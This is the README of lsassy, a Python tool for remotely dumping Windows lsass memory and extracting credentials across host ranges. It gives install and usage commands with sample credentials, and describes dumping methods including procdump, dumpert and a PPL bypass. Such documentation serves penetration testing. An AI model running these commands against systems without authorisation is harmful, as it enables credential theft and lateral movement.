
Extract credentials from lsass remotely
Python tool to remotely extract credentials on a set of hosts. This blog post explains how it works.
This tool uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.
| Chapters | Description |
|---|---|
| Warning | Before using this tool, read this |
| Installation | Lsassy installation |
| Basic usage | Basic lsassy usage |
| Advanced usage | Advanced lsassy usage with params explaination |
| Add dump method | How to add a custom lsass dump method |
| Acknowledgments | Kudos to these people and tools |
| Official Discord | Official Discord server |
Although I have made every effort to make the tool stable, traces may be left if errors occur.
This tool can either leave some lsass dumps if it failed to delete it (even though it tries hard to do so) or leave a scheduled task running if it fails to delete it. This shouldn't happen, but it might. Now, you know, use it with caution.
lsassy works with python >= 3.7
python3 -m pip install lsassy
python3 setup.py install
lsassy works out of the box on multiple targets (IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets)
lsassy [-d domain] -u pixis -p P4ssw0rd targets
lsassy [-d domain] -u pixis -H [LM:]NT targets
By default, lsassy will try to dump lsass remotely using comsvcs.dll method, either via WMI or via a remote scheduled task.
lsassy can authenticate with Kerberos. It requires a valid TGT in KRB5CCNAME environment variable. See advanced usage for more details.
lsassy -k targets
lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.0/24
lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.1-10
lsassy -d hackn.lab -u pixis -p P4ssw0rd hosts.txt
lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.1-192.168.1.10
Different lsass dumping methods are implemented in lsassy, and some option are provided to give control to the user on how the tool will proceed.
lsassy is divided in modules
+-----------+
| Writer |
+-----+-----+
|
|
+----------+ +-----+-----+ +---------+
| Parser |------| Core |----| Session |
+----------+ +-----+-----+ +---------+
|
|
+-----------+
| Dump |-+
| Methods | |-+ +----------+
+-----+-----+ | |----| File |
+-----------+ | +----------+
+------------+
|
|
+-----------+
| Exec |-+
| Methods | |-+
+-----+-----+ | |
+-----------+ |
+------------+
This module is the orchestrator. It creates lsassy class with provided arguments and options, and then calls the different modules to retrieve credentials.
This module is used for logging purpose.
This is a layer built over Impacket to behave like a python built-in file object. It overrides methods like open, read, seek, or close.
This module is where all the dumping logic happens. Depending on the method used, it will execute code on remote host to dump lsass using provided method.
This module relies on pypykatz and uses lsassy file module to remotely parse lsass dump
This module handles the output part, either to the screen in different formats and/or write results to a file
This tool can dump lsass in different ways.
Dumping methods (-m or --method)
This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process.
This method uploads procdump.exe from SysInternals to dump lsass process.
This method uploads dumpert.exe or dumpert.dll from outflanknl to dump lsass process using syscalls.
This methods uploads NativeDump.exe from ricardojoserf to dump lsass process using only NTAPIs.
This method uploads ppldump.exe from itm4n to dump lsass process and bypass PPL.
This method uploads Mirrordump.exe from Ccob to dump lsass using already opened handle to lsass via an LSA plugin.
This method uses WER technique used in PowerSploit.
For some dumping method, options are required, like procdump or dumpert path. These options can be set using --options or -O with a comma separated list of options in a key=value way.
... --options key=value,foo=bar
For example:
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m procdump -O procdump_path=/opt/Sysinternals/procdump.exe
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m dumpert -O dumpert_path=/opt/dumpert.exe
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -m dumpertdll -O dumpertdll_path=/opt/dumpert.dll
You can choose to parse an already dumped lsass process by providing --parse-only switch, alongside with --dump-path and --dump-name parameters.
Note that if you choose this method, the remote lsass dump won't be deleted.
For example:
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab --parse-only --dump-path "/Windows/Temp" --dump-name "lsass.dmp"
If you don't want the dump to be automatically deleted after lsassy run, you can use --keep-dump.